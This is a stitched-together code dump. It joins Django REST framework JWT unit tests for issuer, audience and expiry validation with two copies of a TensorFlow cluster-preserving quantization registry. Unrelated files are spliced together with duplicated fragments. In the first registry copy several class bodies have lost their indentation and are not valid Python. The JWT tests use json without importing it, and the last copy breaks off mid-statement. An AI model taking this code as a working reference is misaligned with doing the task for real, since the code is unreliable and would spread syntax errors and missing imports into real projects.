    def test_fail_issuer_missing(self):
        """Decoding must reject a token whose payload lacks ``iss``."""
        payload = utils.jwt_payload_handler(self.user)
        del payload['iss']
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
            utils.jwt_decode_handler(token)

    def test_fail_issuer_wrong(self):
        """Decoding must reject a token from a different issuer."""
        payload = utils.jwt_payload_handler(self.user)
        payload['iss'] = 'example2.com'
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.InvalidIssuerError):
            utils.jwt_decode_handler(token)

    def test_correct_issuer(self):
        """A token carrying the configured issuer round-trips unchanged."""
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        decoded = utils.jwt_decode_handler(token)
        self.assertEqual(decoded, payload)

    def tearDown(self):
        # Restore the global setting so other test classes are unaffected.
        api_settings.JWT_ISSUER = DEFAULTS['JWT_ISSUER']
import base64
import jwt.exceptions
from django.test import TestCase
from rest_framework_jwt import utils
from rest_framework_jwt.compat import get_user_model
from rest_framework_jwt.settings import api_settings, DEFAULTS
User = get_user_model()
def base64url_decode(input):
    """Decode URL-safe base64 bytes, restoring any stripped '=' padding."""
    padding = -len(input) % 4
    return base64.urlsafe_b64decode(input + b'=' * padding)
class UtilsTests(TestCase):
    """Unit tests for the JWT payload/encode/decode helper handlers."""

    def setUp(self):
        # Fresh user per test; tokens are keyed off this user's username.
        self.username = 'jpueblo'
        self.email = '<EMAIL>'
        self.user = User.objects.create_user(self.username, self.email)

    def test_jwt_payload_handler(self):
        # Payload must be a dict carrying the username and an expiry claim.
        payload = utils.jwt_payload_handler(self.user)
        self.assertTrue(isinstance(payload, dict))
        self.assertEqual(payload['username'], self.username)
        self.assertTrue('exp' in payload)

    def test_jwt_encode(self):
        # Decode the token's middle (payload) segment by hand and compare.
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        payload_data = base64url_decode(token.split('.')[1].encode('utf-8'))
        payload_from_token = json.loads(payload_data.decode('utf-8'))
        self.assertEqual(payload_from_token, payload)

    def test_jwt_decode(self):
        # encode -> decode must round-trip the payload unchanged.
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        decoded_payload = utils.jwt_decode_handler(token)
        self.assertEqual(decoded_payload, payload)

    def test_jwt_response_payload(self):
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        response_data = utils.jwt_response_payload_handler(token)
        self.assertEqual(response_data, dict(token=token))

    def test_jwt_decode_verify_exp(self):
        # With expiry verification off, an already-expired token must decode.
        # NOTE(review): the setting is flipped back inline rather than in a
        # tearDown/finally, so a failure before the restore leaks the setting.
        api_settings.JWT_VERIFY_EXPIRATION = False
        payload = utils.jwt_payload_handler(self.user)
        payload['exp'] = 1
        token = utils.jwt_encode_handler(payload)
        utils.jwt_decode_handler(token)
        api_settings.JWT_VERIFY_EXPIRATION = True
class TestAudience(TestCase):
    """Tests for handling of the ``aud`` (audience) claim."""

    def setUp(self):
        # Configure the expected audience before each test.
        api_settings.JWT_AUDIENCE = 'my_aud'
        self.username = 'jpueblo'
        self.email = '<EMAIL>'
        self.user = User.objects.create_user(self.username, self.email)
        return super(TestAudience, self).setUp()

    def test_fail_audience_missing(self):
        # A token without an ``aud`` claim must be rejected.
        payload = utils.jwt_payload_handler(self.user)
        del payload['aud']
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
            utils.jwt_decode_handler(token)

    def test_fail_audience_wrong(self):
        # A token issued for a different audience must be rejected.
        payload = utils.jwt_payload_handler(self.user)
        payload['aud'] = 'my_aud2'
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.InvalidAudienceError):
            utils.jwt_decode_handler(token)

    def test_correct_audience(self):
        # A token carrying the configured audience round-trips unchanged.
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        decoded_payload = utils.jwt_decode_handler(token)
        self.assertEqual(decoded_payload, payload)

    def tearDown(self):
        # Restore the global setting so other test classes are unaffected.
        api_settings.JWT_AUDIENCE = DEFAULTS['JWT_AUDIENCE']
class TestIssuer(TestCase):
    """Tests for handling of the ``iss`` (issuer) claim."""

    def setUp(self):
        api_settings.JWT_ISSUER = 'example.com'
        self.username = 'jpueblo'
        self.email = '<EMAIL>'
        self.user = User.objects.create_user(self.username, self.email)
        return super(TestIssuer, self).setUp()

    def test_fail_issuer_missing(self):
        """Decoding must reject a token whose payload lacks ``iss``."""
        payload = utils.jwt_payload_handler(self.user)
        del payload['iss']
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.MissingRequiredClaimError):
            utils.jwt_decode_handler(token)

    def test_fail_issuer_wrong(self):
        """Decoding must reject a token from a different issuer."""
        payload = utils.jwt_payload_handler(self.user)
        payload['iss'] = 'example2.com'
        token = utils.jwt_encode_handler(payload)
        with self.assertRaises(jwt.exceptions.InvalidIssuerError):
            utils.jwt_decode_handler(token)

    def test_correct_issuer(self):
        """A token carrying the configured issuer round-trips unchanged."""
        payload = utils.jwt_payload_handler(self.user)
        token = utils.jwt_encode_handler(payload)
        decoded = utils.jwt_decode_handler(token)
        self.assertEqual(decoded, payload)

    def tearDown(self):
        # Restore the global setting so other test classes are unaffected.
        api_settings.JWT_ISSUER = DEFAULTS['JWT_ISSUER']
"""Registry responsible for built-in keras classes."""
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow_model_optimization.python.core.clustering.keras import clustering_registry
from tensorflow_model_optimization.python.core.quantization.keras import quant_ops
from tensorflow_model_optimization.python.core.quantization.keras import quantizers
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantize_registry
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantizers
layers = tf.keras.layers
def get_unique(t):
  """Get unique values and a same-shape lookup index from an N-D tensor.

  Args:
    t: tensor

  Returns:
    (uniques, index): a 1-D tensor of the unique values, and an index
    tensor of the same shape as ``t`` mapping each element to its slot
    in ``uniques``.

  Example:
    t:
    ([[1.0, 2.0],
      [2.0, 3.0],
      [3.0, 3.0],
      [1.0, 2.0]]
    )
    uniques:
    ([1.0, 2.0, 3.0])
    output final index:
    ([[0, 1],
      [1, 2],
      [2, 2],
      [0, 1]]
    )
  """
  flattened = tf.reshape(t, shape=(-1,))
  uniques, flat_index = tf.unique(flattened)
  return uniques, tf.reshape(flat_index, shape=tf.shape(t))
class _ClusterPreserveInfo(object):
  """Per-layer record of which weights/configs support cluster preservation."""

  def __init__(self, weight_attrs, quantize_config_attrs):
    """ClusterPreserveInfo.

    Args:
      weight_attrs: list of cluster preservable weight attributes of layer.
      quantize_config_attrs: list of quantization configuration class name.
    """
    self.weight_attrs = weight_attrs
    self.quantize_config_attrs = quantize_config_attrs
class ClusterPreserveQuantizeRegistry(object):
  """ClusterPreserveQuantizeRegistry for built-in keras layers."""

  # The keys represent built-in keras layers; the first values represent
  # the variables within the layers which hold the kernel weights, second
  # values represent the class name of quantization configuration for layers.
  # This decides whether the weights of a layer, under a given quantization
  # configuration, are cluster preservable.
  _LAYERS_CONFIG_MAP = {
      layers.Conv2D:
      _ClusterPreserveInfo(['kernel'], ['Default8BitConvQuantizeConfig']),
      layers.Dense:
      _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),

      # DepthwiseConv2D is supported with 8bit qat, but not with
      # clustering, thus for DepthwiseConv2D CQAT,
      # preserving clustered weights is disabled.
      layers.DepthwiseConv2D:
      _ClusterPreserveInfo(['depthwise_kernel'],
                           ['Default8BitQuantizeConfig']),

      # layers that are supported with clustering, but not yet with qat
      # layers.Conv1D:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.Conv2DTranspose:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.Conv3D:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.Conv3DTranspose:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.LocallyConnected1D:
      # _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
      # layers.LocallyConnected2D:
      # _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),

      # SeparableConv need verify from 8bit qat
      # layers.SeparableConv1D:
      # _ClusterPreserveInfo(['pointwise_kernel'],
      #                      ['Default8BitConvQuantizeConfig']),
      # layers.SeparableConv2D:
      # _ClusterPreserveInfo(['pointwise_kernel'],
      #                      ['Default8BitConvQuantizeConfig']),

      # Embedding need verify from 8bit qat
      # layers.Embedding: _ClusterPreserveInfo(['embeddings'], []),
  }

  # Layers listed in the config map whose cluster preservation is
  # nevertheless switched off (see DepthwiseConv2D note above).
  _DISABLE_CLUSTER_PRESERVE = frozenset({
      layers.DepthwiseConv2D,
  })

  def __init__(self):
    # Maps a quantize-config class name to the cluster-preserving weight
    # quantizer that should replace its default weight quantizer.
    self._config_quantizer_map = {
        'Default8BitQuantizeConfig':
        ClusterPreserveDefault8BitWeightsQuantizer(),
        'Default8BitConvQuantizeConfig':
        ClusterPreserveDefault8BitConvWeightsQuantizer(),
    }

  @classmethod
  def _no_trainable_weights(cls, layer):
    """Returns whether this layer has trainable weights.

    Args:
      layer: The layer to check for trainable weights.

    Returns:
      True/False whether the layer has trainable weights.
    """
    return not layer.trainable_weights

  @classmethod
  def _disable_cluster_preserve(cls, layer):
    """Returns whether to disable this layer for preserving clusters.

    Args:
      layer: The layer to check for disabling.

    Returns:
      True/False whether disabling this layer for preserving clusters.
    """
    return layer.__class__ in cls._DISABLE_CLUSTER_PRESERVE

  @classmethod
  def supports(cls, layer):
    """Returns whether the registry supports this layer type.

    Args:
      layer: The layer to check for support.

    Returns:
      True/False whether the layer type is supported.
    """
    # layers without trainable weights are considered supported,
    # e.g., ReLU, Softmax, and AveragePooling2D.
    if cls._no_trainable_weights(layer):
      return True

    if layer.__class__ in cls._LAYERS_CONFIG_MAP:
      return True

    return False

  @classmethod
  def _weight_names(cls, layer):
    # Weightless layers have nothing to preserve.
    if cls._no_trainable_weights(layer):
      return []

    return cls._LAYERS_CONFIG_MAP[layer.__class__].weight_attrs

  @classmethod
  def get_cluster_preservable_weights(cls, layer):
    """Get cluster preservable weights from keras layer.

    Args:
      layer: instance of keras layer

    Returns:
      List of cluster preservable weights
    """
    return [getattr(layer, weight) for weight in cls._weight_names(layer)]

  @classmethod
  def get_suppport_quantize_config_names(cls, layer):
    """Get class name of supported quantize config for layer.

    Args:
      layer: instance of keras layer

    Returns:
      List of supported quantize config class name.
    """
    # layers without trainable weights don't need quantize_config for cqat
    if cls._no_trainable_weights(layer):
      return []

    return cls._LAYERS_CONFIG_MAP[layer.__class__].quantize_config_attrs

  def apply_cluster_preserve_quantize_config(self, layer, quantize_config):
    """Applies cluster-preserve weight quantizer.

    Args:
      layer: The layer to check for support.
      quantize_config: quantization config for supporting cluster preservation
        on clustered weights

    Returns:
      The quantize_config with addon cluster preserve weight_quantizer.
    """
    if not self.supports(layer):
      raise ValueError('Layer ' + str(layer.__class__) + ' is not supported.')

    # Example: ReLU, Softmax, and AveragePooling2D (without trainable weights)
    # DepthwiseConv2D (cluster_preserve is disabled)
    if self._no_trainable_weights(layer) or self._disable_cluster_preserve(
        layer):
      return quantize_config

    # Example: Conv2D, Dense layers — swap in the cluster-preserving
    # weight quantizer matching the config's class name.
    if quantize_config.__class__.__name__ in self._LAYERS_CONFIG_MAP[
        layer.__class__].quantize_config_attrs:
      quantize_config.weight_quantizer = self._config_quantizer_map[
          quantize_config.__class__.__name__]
    else:
      raise ValueError('Configuration ' +
                       str(quantize_config.__class__.__name__) +
                       ' is not supported for Layer ' + str(layer.__class__) +
                       '.')

    return quantize_config
class Default8bitClusterPreserveQuantizeRegistry(
    ClusterPreserveQuantizeRegistry):
  """Default 8 bit ClusterPreserveQuantizeRegistry."""

  def get_quantize_config(self, layer):
    """Return the layer's 8-bit quantize config, patched to preserve clusters.

    Args:
      layer: input layer to return quantize config for.

    Returns:
      The default 8-bit quantization config for ``layer`` with a
      cluster-preserving weight quantizer attached.
    """
    base_registry = default_8bit_quantize_registry.Default8BitQuantizeRegistry()
    base_config = base_registry.get_quantize_config(layer)
    return self.apply_cluster_preserve_quantize_config(layer, base_config)
class ClusterPreserveDefaultWeightsQuantizer(quantizers.LastValueQuantizer):
"""Quantize weights while preserving clusters."""
def __init__(self, num_bits, per_axis, symmetric, narrow_range):
"""ClusterPreserveDefaultWeightsQuantizer.
Args:
num_bits: Number of bits for quantization
per_axis: Whether to apply per_axis quantization. The last dimension is
used as the axis.
symmetric: If true, use symmetric quantization limits instead of training
the minimum and maximum of each quantization range separately.
narrow_range: In case of 8 bits, narrow_range nudges the quantized range
to be [-127, 127] instead of [-128, 127]. This ensures symmetric
range has 0 as the centre.
"""
super(ClusterPreserveDefaultWeightsQuantizer, self).__init__(
num_bits=num_bits,
per_axis=per_axis,
symmetric=symmetric,
narrow_range=narrow_range,
)
def _build_clusters(self, name, layer):
"""Extract the cluster centroids and cluster indices from the pretrained clustered model.
Args:
name: Name of weights in layer.
layer: Quantization wrapped keras layer.
Returns:
A dictionary of the initial values of the
cluster centroids, cluster indices, original weights,
the pretrained flag for marking the first training
epoch, and weight name.
"""
weights = getattr(layer.layer, name)
centroids, lookup = get_unique(weights)
# Prepare trainable variables for the Keras graph
clst_centroids_tf = layer.add_weight(
'cluster_centroids_tf',
shape=centroids.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([centroids])[0]),
dtype=centroids.dtype,
trainable=True)
ori_weights_tf = layer.add_weight(
'ori_weights_vars_tf',
shape=weights.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([weights])[0]),
dtype=weights.dtype,
trainable=True)
# Get clustering implementation according to layer type
clustering_impl_cls = clustering_registry.ClusteringLookupRegistry().\
get_clustering_impl(layer.layer, name)
clustering_impl = clustering_impl_cls(clst_centroids_tf)
pulling_indices = tf.dtypes.cast(
clustering_impl.get_pulling_indices(ori_weights_tf),
lookup.dtype
)
pulling_indices_tf = layer.add_weight(
'pulling_indices_tf',
shape=lookup.shape,
initializer=tf.keras.initializers.Constant(
value=K.batch_get_value([pulling_indices])[0]),
dtype=lookup.dtype,
trainable=False)
for v in layer.weights:
if 'kernel' in v.name:
kernel = v
result = {
'cluster_centroids_tf': clst_centroids_tf,
'pulling_indices_tf': pulling_indices_tf,
'ori_weights_vars_tf': ori_weights_tf,
'weight_name': name,
'clst_impl': clustering_impl,
'set_kernel_weight': kernel,
}
return result
def build(self, tensor_shape, name, layer):
"""Extract centroids and indices to preserve weights clusters.
Args:
tensor_shape: Shape of weights which needs to be quantized.
name: Name of weights in layer.
layer: Quantization wrapped keras layer.
Returns:
Dictionary of centroids, indices and
quantization params, the dictionary will be passed
to __call__ function.
"""
# To get all the initial values from pretrained clustered model
result = self._build_clusters(name, layer)
result.update(
super(ClusterPreserveDefaultWeightsQuantizer,
self).build(tensor_shape, name, layer))
return result
def __call__(self, inputs, training, weights, **kwargs):
"""Apply cluster preserved quantization to the input tensor.
Args:
inputs: Input tensor (layer's weights) to be quantized.
training: Whether the graph is currently training.
weights: Dictionary of weights (params) the quantizer can use to
quantize the tensor (layer's weights). This contains the weights
created in the `build` function.
**kwargs: Additional variables which may be passed to the quantizer.
Returns:
quantized tensor.
"""
# update associations
if training:
weights['pulling_indices_tf'].assign(
tf.dtypes.cast(weights['clst_impl']
.get_pulling_indices(weights['ori_weights_vars_tf']),
weights['pulling_indices_tf'].dtype)
)
clustered_inputs = weights['clst_impl'].get_clustered_weight_forward(
weights['pulling_indices_tf'], weights['ori_weights_vars_tf']
)
weights['set_kernel_weight'].assign(clustered_inputs)
else:
clustered_inputs = inputs
return quant_ops.LastValueQuantize(
clustered_inputs,
weights['min_var'],
weights['max_var'],
is_training=training,
num_bits=self.num_bits,
per_channel=self.per_axis,
symmetric=self.symmetric,
narrow_range=self.narrow_range
)
class ClusterPreserveDefault8BitWeightsQuantizer(
    ClusterPreserveDefaultWeightsQuantizer):
  """ClusterPreserveWeightsQuantizer for default 8bit weights."""
  def __init__(self):
    # Standard 8-bit settings: per-tensor (not per-axis), symmetric limits,
    # narrow range so the quantized interval is [-127, 127] centred on 0.
    super(ClusterPreserveDefault8BitWeightsQuantizer,
          self).__init__(num_bits=8,
                         per_axis=False,
                         symmetric=True,
                         narrow_range=True)
class ClusterPreserveDefault8BitConvWeightsQuantizer(
ClusterPreserveDefaultWeightsQuantizer,
default_8bit_quantizers.Default8BitConvWeightsQuantizer):
"""ClusterPreserveWeightsQuantizer for default 8bit Conv2D weights."""
def __init__(self): # pylint:disable=super-init-not-called
default_8bit_quantizers.Default8BitConvWeightsQuantizer.__init__(self)
def build(self, tensor_shape, name, layer):
result = ClusterPreserveDefaultWeightsQuantizer._build_clusters(
self, name, layer)
result.update(
default_8bit_quantizers.Default8BitConvWeightsQuantizer.build(
self, tensor_shape, name, layer))
return result | tensorflow_model_optimization/python/core/quantization/keras/collaborative_optimizations/cluster_preserve/cluster_preserve_quantize_registry.py | """Registry responsible for built-in keras classes."""
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow_model_optimization.python.core.clustering.keras import clustering_registry
from tensorflow_model_optimization.python.core.quantization.keras import quant_ops
from tensorflow_model_optimization.python.core.quantization.keras import quantizers
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantize_registry
from tensorflow_model_optimization.python.core.quantization.keras.default_8bit import default_8bit_quantizers
layers = tf.keras.layers
def get_unique(t):
  """Get unique values and lookup index from N-D tensor.

  Args:
    t: tensor

  Returns:
    unique value, lookup index (same shape as input tensor)

  Example:
    t:
      ([[1.0, 2.0],
        [2.0, 3.0],
        [3.0, 3.0],
        [1.0, 2.0]]
      )
    uniques:
      ([1.0, 2.0, 3.0])
    output final index:
      ([[0, 1],
        [1, 2],
        [2, 2],
        [0, 1]]
      )
  """
  flattened = tf.reshape(t, shape=(-1,))
  unique_vals, flat_index = tf.unique(flattened)
  index = tf.reshape(flat_index, shape=tf.shape(t))
  return unique_vals, index
class _ClusterPreserveInfo(object):
  """Per-layer metadata used by the cluster-preserve registry."""

  def __init__(self, weight_attrs, quantize_config_attrs):
    """_ClusterPreserveInfo.

    Args:
      weight_attrs: list of cluster preservable weight attributes of layer.
      quantize_config_attrs: list of quantization configuration class name.
    """
    self.weight_attrs, self.quantize_config_attrs = (
        weight_attrs, quantize_config_attrs)
class ClusterPreserveQuantizeRegistry(object):
  """ClusterPreserveQuantizeRegistry for built-in keras layers."""
  # The keys represent built-in keras layers; the first values represent the
  # the variables within the layers which hold the kernel weights, second
  # values represent the class name of quantization configuration for layers.
  # This decide the weights of layers with quantization configurations are
  # cluster preservable.
  _LAYERS_CONFIG_MAP = {
      layers.Conv2D:
          _ClusterPreserveInfo(['kernel'], ['Default8BitConvQuantizeConfig']),
      layers.Dense:
          _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
      # DepthwiseConv2D is supported with 8bit qat, but not with
      # clustering, thus for DepthwiseConv2D CQAT,
      # preserving clustered weights is disabled.
      layers.DepthwiseConv2D:
          _ClusterPreserveInfo(['depthwise_kernel'],
                               ['Default8BitQuantizeConfig']),
      # layers that are supported with clustering, but not yet with qat
      # layers.Conv1D:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.Conv2DTranspose:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.Conv3D:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.Conv3DTranspose:
      # _ClusterPreserveInfo(['kernel'], []),
      # layers.LocallyConnected1D:
      # _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
      # layers.LocallyConnected2D:
      # _ClusterPreserveInfo(['kernel'], ['Default8BitQuantizeConfig']),
      # SeparableConv need verify from 8bit qat
      # layers.SeparableConv1D:
      # _ClusterPreserveInfo(['pointwise_kernel'],
      #                      ['Default8BitConvQuantizeConfig']),
      # layers.SeparableConv2D:
      # _ClusterPreserveInfo(['pointwise_kernel'],
      #                      ['Default8BitConvQuantizeConfig']),
      # Embedding need verify from 8bit qat
      # layers.Embedding: _ClusterPreserveInfo(['embeddings'], []),
  }
  # Layer classes for which cluster preservation is explicitly disabled even
  # though they have an entry in _LAYERS_CONFIG_MAP.
  _DISABLE_CLUSTER_PRESERVE = frozenset({
      layers.DepthwiseConv2D,
  })
  def __init__(self):
    # Maps a quantize config class name to the quantizer instance that both
    # quantizes and preserves the weight clusters for that configuration.
    self._config_quantizer_map = {
        'Default8BitQuantizeConfig':
            ClusterPreserveDefault8BitWeightsQuantizer(),
        'Default8BitConvQuantizeConfig':
            ClusterPreserveDefault8BitConvWeightsQuantizer(),
    }
  @classmethod
  def _no_trainable_weights(cls, layer):
    """Returns whether this layer has trainable weights.
    Args:
      layer: The layer to check for trainable weights.
    Returns:
      True/False whether the layer has trainable weights.
    """
    return not layer.trainable_weights
  @classmethod
  def _disable_cluster_preserve(cls, layer):
    """Returns whether disable this layer for preserving clusters.
    Args:
      layer: The layer to check for disabling.
    Returns:
      True/False whether disabling this layer for preserving clusters.
    """
    return layer.__class__ in cls._DISABLE_CLUSTER_PRESERVE
  @classmethod
  def supports(cls, layer):
    """Returns whether the registry supports this layer type.
    Args:
      layer: The layer to check for support.
    Returns:
      True/False whether the layer type is supported.
    """
    # layers without trainable weights are consider supported,
    # e.g., ReLU, Softmax, and AveragePooling2D.
    if cls._no_trainable_weights(layer):
      return True
    if layer.__class__ in cls._LAYERS_CONFIG_MAP:
      return True
    return False
  @classmethod
  def _weight_names(cls, layer):
    # Names of the layer attributes holding preservable weights; raises
    # KeyError for layer classes absent from _LAYERS_CONFIG_MAP, so callers
    # are expected to check supports() first.
    if cls._no_trainable_weights(layer):
      return []
    return cls._LAYERS_CONFIG_MAP[layer.__class__].weight_attrs
  @classmethod
  def get_cluster_preservable_weights(cls, layer):
    """Get cluster preservable weights from keras layer.
    Args:
      layer: instance of keras layer
    Returns:
      List of cluster preservable weights
    """
    return [getattr(layer, weight) for weight in cls._weight_names(layer)]
  @classmethod
  def get_suppport_quantize_config_names(cls, layer):
    """Get class name of supported quantize config for layer.
    NOTE(review): the method name misspells "support"; kept as-is because it
    is part of the public API of this registry.
    Args:
      layer: instance of keras layer
    Returns:
      List of supported quantize config class name.
    """
    # layers without trainable weights don't need quantize_config for cqat
    if cls._no_trainable_weights(layer):
      return []
    return cls._LAYERS_CONFIG_MAP[layer.__class__].quantize_config_attrs
  def apply_cluster_preserve_quantize_config(self, layer, quantize_config):
    """Applies cluster-preserve weight quantizer.
    Args:
      layer: The layer to check for support.
      quantize_config: quantization config for supporting cluster preservation
        on clustered weights
    Returns:
      The quantize_config with addon cluster preserve weight_quantizer.
    """
    if not self.supports(layer):
      raise ValueError('Layer ' + str(layer.__class__) + ' is not supported.')
    # Example: ReLU, Softmax, and AveragePooling2D (without trainable weights)
    # DepthwiseConv2D (cluster_preserve is disabled)
    if self._no_trainable_weights(layer) or self._disable_cluster_preserve(
        layer):
      return quantize_config
    # Example: Conv2D, Dense layers
    if quantize_config.__class__.__name__ in self._LAYERS_CONFIG_MAP[
        layer.__class__].quantize_config_attrs:
      # Swap in the cluster-preserving weight quantizer for this config.
      quantize_config.weight_quantizer = self._config_quantizer_map[
          quantize_config.__class__.__name__]
    else:
      raise ValueError('Configuration ' +
                       str(quantize_config.__class__.__name__) +
                       ' is not supported for Layer ' + str(layer.__class__) +
                       '.')
    return quantize_config
class Default8bitClusterPreserveQuantizeRegistry(
    ClusterPreserveQuantizeRegistry):
  """Default 8 bit ClusterPreserveQuantizeRegistry."""

  def get_quantize_config(self, layer):
    """Returns the quantization config with addon cluster preserve weight_quantizer for the given layer.

    Args:
      layer: input layer to return quantize config for.

    Returns:
      Returns the quantization config for cluster preserve weight_quantizer.
    """
    base_registry = default_8bit_quantize_registry.Default8BitQuantizeRegistry()
    base_config = base_registry.get_quantize_config(layer)
    return super(
        Default8bitClusterPreserveQuantizeRegistry,
        self).apply_cluster_preserve_quantize_config(layer, base_config)
class ClusterPreserveDefaultWeightsQuantizer(quantizers.LastValueQuantizer):
  """Quantize weights while preserving clusters."""

  def __init__(self, num_bits, per_axis, symmetric, narrow_range):
    """ClusterPreserveDefaultWeightsQuantizer.

    Args:
      num_bits: Number of bits for quantization
      per_axis: Whether to apply per_axis quantization. The last dimension is
        used as the axis.
      symmetric: If true, use symmetric quantization limits instead of training
        the minimum and maximum of each quantization range separately.
      narrow_range: In case of 8 bits, narrow_range nudges the quantized range
        to be [-127, 127] instead of [-128, 127]. This ensures symmetric
        range has 0 as the centre.
    """
    super(ClusterPreserveDefaultWeightsQuantizer, self).__init__(
        num_bits=num_bits,
        per_axis=per_axis,
        symmetric=symmetric,
        narrow_range=narrow_range,
    )

  def _build_clusters(self, name, layer):
    """Extract the cluster centroids and cluster indices from the pretrained clustered model.

    Args:
      name: Name of weights in layer.
      layer: Quantization wrapped keras layer.

    Returns:
      A dictionary of the initial values of the cluster centroids, cluster
      indices, original weights, the clustering implementation, the kernel
      variable to write clustered weights into, and the weight name.

    Raises:
      ValueError: if the wrapped layer has no variable with 'kernel' in its
        name to write the clustered weights back into.
    """
    weights = getattr(layer.layer, name)
    centroids, lookup = get_unique(weights)
    # Prepare trainable variables for the Keras graph
    clst_centroids_tf = layer.add_weight(
        'cluster_centroids_tf',
        shape=centroids.shape,
        initializer=tf.keras.initializers.Constant(
            value=K.batch_get_value([centroids])[0]),
        dtype=centroids.dtype,
        trainable=True)
    ori_weights_tf = layer.add_weight(
        'ori_weights_vars_tf',
        shape=weights.shape,
        initializer=tf.keras.initializers.Constant(
            value=K.batch_get_value([weights])[0]),
        dtype=weights.dtype,
        trainable=True)
    # Get clustering implementation according to layer type
    clustering_impl_cls = clustering_registry.ClusteringLookupRegistry().\
        get_clustering_impl(layer.layer, name)
    clustering_impl = clustering_impl_cls(clst_centroids_tf)
    pulling_indices = tf.dtypes.cast(
        clustering_impl.get_pulling_indices(ori_weights_tf),
        lookup.dtype
    )
    pulling_indices_tf = layer.add_weight(
        'pulling_indices_tf',
        shape=lookup.shape,
        initializer=tf.keras.initializers.Constant(
            value=K.batch_get_value([pulling_indices])[0]),
        dtype=lookup.dtype,
        trainable=False)
    # Find the variable the clustered weights are assigned back into during
    # training (the last variable whose name contains 'kernel', as before).
    # BUGFIX: `kernel` used to be left unbound when no such variable existed,
    # which raised a confusing NameError below; fail with a clear message.
    kernel = None
    for v in layer.weights:
      if 'kernel' in v.name:
        kernel = v
    if kernel is None:
      raise ValueError(
          'No variable with "kernel" in its name found in layer ' +
          str(layer.layer.__class__) + '; cannot preserve clusters.')
    result = {
        'cluster_centroids_tf': clst_centroids_tf,
        'pulling_indices_tf': pulling_indices_tf,
        'ori_weights_vars_tf': ori_weights_tf,
        'weight_name': name,
        'clst_impl': clustering_impl,
        'set_kernel_weight': kernel,
    }
    return result

  def build(self, tensor_shape, name, layer):
    """Extract centroids and indices to preserve weights clusters.

    Args:
      tensor_shape: Shape of weights which needs to be quantized.
      name: Name of weights in layer.
      layer: Quantization wrapped keras layer.

    Returns:
      Dictionary of centroids, indices and quantization params, the
      dictionary will be passed to __call__ function.
    """
    # To get all the initial values from pretrained clustered model
    result = self._build_clusters(name, layer)
    # Merge in the min/max variables created by LastValueQuantizer.build.
    result.update(
        super(ClusterPreserveDefaultWeightsQuantizer,
              self).build(tensor_shape, name, layer))
    return result

  def __call__(self, inputs, training, weights, **kwargs):
    """Apply cluster preserved quantization to the input tensor.

    Args:
      inputs: Input tensor (layer's weights) to be quantized.
      training: Whether the graph is currently training.
      weights: Dictionary of weights (params) the quantizer can use to
        quantize the tensor (layer's weights). This contains the weights
        created in the `build` function.
      **kwargs: Additional variables which may be passed to the quantizer.

    Returns:
      quantized tensor.
    """
    if training:
      # Re-associate each original weight with its nearest centroid, then
      # rebuild the clustered weight tensor from centroids + indices so the
      # forward pass uses (and propagates gradients through) the centroids.
      weights['pulling_indices_tf'].assign(
          tf.dtypes.cast(
              weights['clst_impl'].get_pulling_indices(
                  weights['ori_weights_vars_tf']),
              weights['pulling_indices_tf'].dtype))
      clustered_inputs = weights['clst_impl'].get_clustered_weight_forward(
          weights['pulling_indices_tf'], weights['ori_weights_vars_tf'])
      weights['set_kernel_weight'].assign(clustered_inputs)
    else:
      clustered_inputs = inputs
    return quant_ops.LastValueQuantize(
        clustered_inputs,
        weights['min_var'],
        weights['max_var'],
        is_training=training,
        num_bits=self.num_bits,
        per_channel=self.per_axis,
        symmetric=self.symmetric,
        narrow_range=self.narrow_range
    )
class ClusterPreserveDefault8BitWeightsQuantizer(
    ClusterPreserveDefaultWeightsQuantizer):
  """ClusterPreserveWeightsQuantizer for default 8bit weights."""

  def __init__(self):
    """Configure the base quantizer with the standard 8-bit settings."""
    eight_bit_settings = {
        'num_bits': 8,
        'per_axis': False,
        'symmetric': True,
        'narrow_range': True,
    }
    super(ClusterPreserveDefault8BitWeightsQuantizer, self).__init__(
        **eight_bit_settings)
class ClusterPreserveDefault8BitConvWeightsQuantizer(
    ClusterPreserveDefaultWeightsQuantizer,
    default_8bit_quantizers.Default8BitConvWeightsQuantizer):
  """ClusterPreserveWeightsQuantizer for default 8bit Conv2D weights."""

  def __init__(self):  # pylint:disable=super-init-not-called
    # Delegate setup to the conv-specific quantizer only; the cluster
    # bookkeeping is attached in build().
    default_8bit_quantizers.Default8BitConvWeightsQuantizer.__init__(self)

  def build(self, tensor_shape, name, layer):
    """Combine cluster bookkeeping with the conv quantizer's build params."""
    cluster_params = ClusterPreserveDefaultWeightsQuantizer._build_clusters(
        self, name, layer)
    conv_params = default_8bit_quantizers.Default8BitConvWeightsQuantizer.build(
